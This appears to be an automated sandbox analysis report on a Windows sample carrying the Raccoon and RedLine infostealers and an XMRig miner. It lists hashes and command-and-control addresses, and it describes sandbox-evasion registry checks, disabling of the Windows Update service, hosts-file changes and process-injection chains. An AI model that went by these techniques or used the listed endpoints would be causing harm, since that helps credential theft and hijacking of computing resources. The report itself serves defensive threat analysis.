raccoon | 3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055

Analysis

max time kernel
300s
max time network
267s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
19-10-2022 04:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe
Size

344KB
MD5

b9844cb9509f6252dcb12d4898f48624
SHA1

d2f377a1c8c070cb1884bf0b308e6fdf21067b73
SHA256

3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055
SHA512

a7d5b004a42a215452b3e89e5804a717325c5caaee65b08da6c0a73ca6d05f03dfbfc7242e1481d332f5d3fe8d1dbe48c2bbb3977c4f7ab54c6011952b0ba354
SSDEEP

6144:kq6LFGh9VxSaYmn9EqgJ/kQ4yuooheHRfcu+FM9m4P6u270ufmjrlRWz:knwnW4EqNyuooxu+ysAl24cex

Score

10^/10

raccoon redline xmrig 72aed310d11382f82b5918621baa858c 875784825 discovery evasion infostealer miner spyware stealer themida trojan upx

Malware Config

Extracted

Family

raccoon

Botnet

72aed310d11382f82b5918621baa858c

http://77.73.133.7/

rc4.plain

Extracted

Family

redline

Botnet

875784825

79.137.192.6:8362

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/93164-558-0x000000000025972E-mapping.dmp	family_redline
behavioral2/memory/93164-597-0x0000000000240000-0x000000000025E000-memory.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

setup.exesetup32.exeupdater.exeMoUSO.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	MoUSO.exe

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/8700-1510-0x00007FF6001B0000-0x00007FF6009A4000-memory.dmp	xmrig
behavioral2/memory/8700-1513-0x00007FF6001B0000-0x00007FF6009A4000-memory.dmp	xmrig

Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

15 4100 WScript.exe
Downloads MZ/PE file
Drops file in Drivers directory 2 IoCs

Processes:

setup32.exeupdater.exe

description ioc process

File created C:\Windows\system32\drivers\etc\hosts setup32.exe
File created C:\Windows\system32\drivers\etc\hosts updater.exe
Executes dropped EXE 8 IoCs

Processes:

setup.exesetup32.exesetup3221.exe222.exe2.0.2-beta.exewatchdog.exeupdater.exeMoUSO.exe

pid process

380 setup.exe
4396 setup32.exe
2112 setup3221.exe
5000 222.exe
4176 2.0.2-beta.exe
4200 watchdog.exe
4708 updater.exe
8220 MoUSO.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
15	4100	WScript.exe

description	ioc	process
File created	C:\Windows\system32\drivers\etc\hosts	setup32.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/8700-1510-0x00007FF6001B0000-0x00007FF6009A4000-memory.dmp	upx
behavioral2/memory/8700-1513-0x00007FF6001B0000-0x00007FF6009A4000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

setup32.exeupdater.exeMoUSO.exesetup.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MoUSO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MoUSO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

setup.exeMoUSO.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Wine	setup.exe
Key opened	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Software\Wine	MoUSO.exe

Loads dropped DLL 3 IoCs

Processes:

2.0.2-beta.exe

pid process

4176 2.0.2-beta.exe
4176 2.0.2-beta.exe
4176 2.0.2-beta.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4176	2.0.2-beta.exe
4176	2.0.2-beta.exe
4176	2.0.2-beta.exe

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\setup32.exe	themida
behavioral2/memory/4396-204-0x00007FF713AB0000-0x00007FF714749000-memory.dmp	themida
behavioral2/memory/4396-455-0x00007FF713AB0000-0x00007FF714749000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\setup32.exe	themida
behavioral2/memory/4396-720-0x00007FF713AB0000-0x00007FF714749000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/4708-739-0x00007FF6B8A10000-0x00007FF6B96A9000-memory.dmp	themida
behavioral2/memory/4708-1024-0x00007FF6B8A10000-0x00007FF6B96A9000-memory.dmp	themida
C:\Program Files\Google\Chrome\updater.exe	themida
behavioral2/memory/4708-1508-0x00007FF6B8A10000-0x00007FF6B96A9000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

setup32.exeupdater.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup32.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

setup.exesetup32.exeupdater.exeMoUSO.exe

pid process

380 setup.exe
4396 setup32.exe
4708 updater.exe
8220 MoUSO.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exewatchdog.exeupdater.exe

description	pid	process	target process
PID 2628 set thread context of 2700	2628	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 4200 set thread context of 93164	4200	watchdog.exe	vbc.exe
PID 4708 set thread context of 8392	4708	updater.exe	conhost.exe
PID 4708 set thread context of 8700	4708	updater.exe	conhost.exe

Drops file in Program Files directory 4 IoCs

Processes:

setup32.exeupdater.execmd.execmd.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	setup32.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

376 sc.exe
3244 sc.exe
6896 sc.exe
7052 sc.exe
5012 sc.exe
940 sc.exe
240 sc.exe
6848 sc.exe
6924 sc.exe
7004 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4196 schtasks.exe

pid	process
376	sc.exe
3244	sc.exe
6896	sc.exe
7052	sc.exe
5012	sc.exe
940	sc.exe
240	sc.exe
6848	sc.exe
6924	sc.exe
7004	sc.exe

pid	process
4196	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe

Modifies registry class 1 IoCs

Processes:

setup3221.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings setup3221.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 15 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000_Classes\Local Settings	setup3221.exe

description	flow	ioc
HTTP User-Agent header	15	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

setup.exepowershell.exepowershell.exepowershell.exevbc.exepowershell.exepowershell.exeMoUSO.exe

pid	process
380	setup.exe
380	setup.exe
79684	powershell.exe
79684	powershell.exe
79684	powershell.exe
3204	powershell.exe
3204	powershell.exe
3204	powershell.exe
2628	powershell.exe
2628	powershell.exe
2628	powershell.exe
93164	vbc.exe
93164	vbc.exe
6060	powershell.exe
6060	powershell.exe
6060	powershell.exe
6796	powershell.exe
6796	powershell.exe
6796	powershell.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe
8220	MoUSO.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

656

pid	process
656

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exevbc.exe

description	pid	process
Token: SeDebugPrivilege	79684	powershell.exe
Token: SeIncreaseQuotaPrivilege	79684	powershell.exe
Token: SeSecurityPrivilege	79684	powershell.exe
Token: SeTakeOwnershipPrivilege	79684	powershell.exe
Token: SeLoadDriverPrivilege	79684	powershell.exe
Token: SeSystemProfilePrivilege	79684	powershell.exe
Token: SeSystemtimePrivilege	79684	powershell.exe
Token: SeProfSingleProcessPrivilege	79684	powershell.exe
Token: SeIncBasePriorityPrivilege	79684	powershell.exe
Token: SeCreatePagefilePrivilege	79684	powershell.exe
Token: SeBackupPrivilege	79684	powershell.exe
Token: SeRestorePrivilege	79684	powershell.exe
Token: SeShutdownPrivilege	79684	powershell.exe
Token: SeDebugPrivilege	79684	powershell.exe
Token: SeSystemEnvironmentPrivilege	79684	powershell.exe
Token: SeRemoteShutdownPrivilege	79684	powershell.exe
Token: SeUndockPrivilege	79684	powershell.exe
Token: SeManageVolumePrivilege	79684	powershell.exe
Token: 33	79684	powershell.exe
Token: 34	79684	powershell.exe
Token: 35	79684	powershell.exe
Token: 36	79684	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeShutdownPrivilege	5044	powercfg.exe
Token: SeCreatePagefilePrivilege	5044	powercfg.exe
Token: SeShutdownPrivilege	1472	powercfg.exe
Token: SeCreatePagefilePrivilege	1472	powercfg.exe
Token: SeShutdownPrivilege	1648	powercfg.exe
Token: SeCreatePagefilePrivilege	1648	powercfg.exe
Token: SeShutdownPrivilege	232	powercfg.exe
Token: SeCreatePagefilePrivilege	232	powercfg.exe
Token: SeDebugPrivilege	93164	vbc.exe
Token: SeIncreaseQuotaPrivilege	3204	powershell.exe
Token: SeSecurityPrivilege	3204	powershell.exe
Token: SeTakeOwnershipPrivilege	3204	powershell.exe
Token: SeLoadDriverPrivilege	3204	powershell.exe
Token: SeSystemProfilePrivilege	3204	powershell.exe
Token: SeSystemtimePrivilege	3204	powershell.exe
Token: SeProfSingleProcessPrivilege	3204	powershell.exe
Token: SeIncBasePriorityPrivilege	3204	powershell.exe
Token: SeCreatePagefilePrivilege	3204	powershell.exe
Token: SeBackupPrivilege	3204	powershell.exe
Token: SeRestorePrivilege	3204	powershell.exe
Token: SeShutdownPrivilege	3204	powershell.exe
Token: SeDebugPrivilege	3204	powershell.exe
Token: SeSystemEnvironmentPrivilege	3204	powershell.exe
Token: SeRemoteShutdownPrivilege	3204	powershell.exe
Token: SeUndockPrivilege	3204	powershell.exe
Token: SeManageVolumePrivilege	3204	powershell.exe
Token: 33	3204	powershell.exe
Token: 34	3204	powershell.exe
Token: 35	3204	powershell.exe
Token: 36	3204	powershell.exe
Token: SeIncreaseQuotaPrivilege	3204	powershell.exe
Token: SeSecurityPrivilege	3204	powershell.exe
Token: SeTakeOwnershipPrivilege	3204	powershell.exe
Token: SeLoadDriverPrivilege	3204	powershell.exe
Token: SeSystemProfilePrivilege	3204	powershell.exe
Token: SeSystemtimePrivilege	3204	powershell.exe
Token: SeProfSingleProcessPrivilege	3204	powershell.exe
Token: SeIncBasePriorityPrivilege	3204	powershell.exe
Token: SeCreatePagefilePrivilege	3204	powershell.exe
Token: SeBackupPrivilege	3204	powershell.exe
Token: SeRestorePrivilege	3204	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exeRegSvcs.exesetup.exesetup3221.exe222.exesetup32.exewatchdog.execmd.execmd.exe

description	pid	process	target process
PID 2628 wrote to memory of 2700	2628	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2628 wrote to memory of 2700	2628	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2628 wrote to memory of 2700	2628	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2628 wrote to memory of 2700	2628	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2628 wrote to memory of 2700	2628	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2628 wrote to memory of 2700	2628	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2628 wrote to memory of 2700	2628	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2628 wrote to memory of 2700	2628	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2628 wrote to memory of 2700	2628	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2628 wrote to memory of 2700	2628	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2628 wrote to memory of 2700	2628	3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe	RegSvcs.exe
PID 2700 wrote to memory of 380	2700	RegSvcs.exe	setup.exe
PID 2700 wrote to memory of 380	2700	RegSvcs.exe	setup.exe
PID 2700 wrote to memory of 380	2700	RegSvcs.exe	setup.exe
PID 2700 wrote to memory of 4396	2700	RegSvcs.exe	setup32.exe
PID 2700 wrote to memory of 4396	2700	RegSvcs.exe	setup32.exe
PID 380 wrote to memory of 4196	380	setup.exe	schtasks.exe
PID 380 wrote to memory of 4196	380	setup.exe	schtasks.exe
PID 380 wrote to memory of 4196	380	setup.exe	schtasks.exe
PID 2700 wrote to memory of 2112	2700	RegSvcs.exe	setup3221.exe
PID 2700 wrote to memory of 2112	2700	RegSvcs.exe	setup3221.exe
PID 2700 wrote to memory of 2112	2700	RegSvcs.exe	setup3221.exe
PID 2112 wrote to memory of 4100	2112	setup3221.exe	WScript.exe
PID 2112 wrote to memory of 4100	2112	setup3221.exe	WScript.exe
PID 2112 wrote to memory of 4100	2112	setup3221.exe	WScript.exe
PID 2112 wrote to memory of 5000	2112	setup3221.exe	222.exe
PID 2112 wrote to memory of 5000	2112	setup3221.exe	222.exe
PID 2112 wrote to memory of 5000	2112	setup3221.exe	222.exe
PID 5000 wrote to memory of 4176	5000	222.exe	2.0.2-beta.exe
PID 5000 wrote to memory of 4176	5000	222.exe	2.0.2-beta.exe
PID 5000 wrote to memory of 4176	5000	222.exe	2.0.2-beta.exe
PID 2700 wrote to memory of 4200	2700	RegSvcs.exe	watchdog.exe
PID 2700 wrote to memory of 4200	2700	RegSvcs.exe	watchdog.exe
PID 2700 wrote to memory of 4200	2700	RegSvcs.exe	watchdog.exe
PID 4396 wrote to memory of 79684	4396	setup32.exe	powershell.exe
PID 4396 wrote to memory of 79684	4396	setup32.exe	powershell.exe
PID 4200 wrote to memory of 93164	4200	watchdog.exe	vbc.exe
PID 4200 wrote to memory of 93164	4200	watchdog.exe	vbc.exe
PID 4200 wrote to memory of 93164	4200	watchdog.exe	vbc.exe
PID 4200 wrote to memory of 93164	4200	watchdog.exe	vbc.exe
PID 4200 wrote to memory of 93164	4200	watchdog.exe	vbc.exe
PID 4396 wrote to memory of 5108	4396	setup32.exe	cmd.exe
PID 4396 wrote to memory of 5108	4396	setup32.exe	cmd.exe
PID 4396 wrote to memory of 5092	4396	setup32.exe	cmd.exe
PID 4396 wrote to memory of 5092	4396	setup32.exe	cmd.exe
PID 4396 wrote to memory of 3204	4396	setup32.exe	powershell.exe
PID 4396 wrote to memory of 3204	4396	setup32.exe	powershell.exe
PID 5108 wrote to memory of 5012	5108	cmd.exe	sc.exe
PID 5108 wrote to memory of 5012	5108	cmd.exe	sc.exe
PID 5108 wrote to memory of 376	5108	cmd.exe	sc.exe
PID 5108 wrote to memory of 376	5108	cmd.exe	sc.exe
PID 5092 wrote to memory of 5044	5092	cmd.exe	powercfg.exe
PID 5092 wrote to memory of 5044	5092	cmd.exe	powercfg.exe
PID 5108 wrote to memory of 3244	5108	cmd.exe	sc.exe
PID 5108 wrote to memory of 3244	5108	cmd.exe	sc.exe
PID 5092 wrote to memory of 1472	5092	cmd.exe	powercfg.exe
PID 5092 wrote to memory of 1472	5092	cmd.exe	powercfg.exe
PID 5108 wrote to memory of 940	5108	cmd.exe	sc.exe
PID 5108 wrote to memory of 940	5108	cmd.exe	sc.exe
PID 5092 wrote to memory of 1648	5092	cmd.exe	powercfg.exe
PID 5092 wrote to memory of 1648	5092	cmd.exe	powercfg.exe
PID 5108 wrote to memory of 240	5108	cmd.exe	sc.exe
PID 5108 wrote to memory of 240	5108	cmd.exe	sc.exe
PID 5092 wrote to memory of 232	5092	cmd.exe	powercfg.exe

C:\Users\Admin\AppData\Local\Temp\3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe
"C:\Users\Admin\AppData\Local\Temp\3ab8365f091655f7130f0df091e082379400d3528361e83b9627e722154ec055.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2628

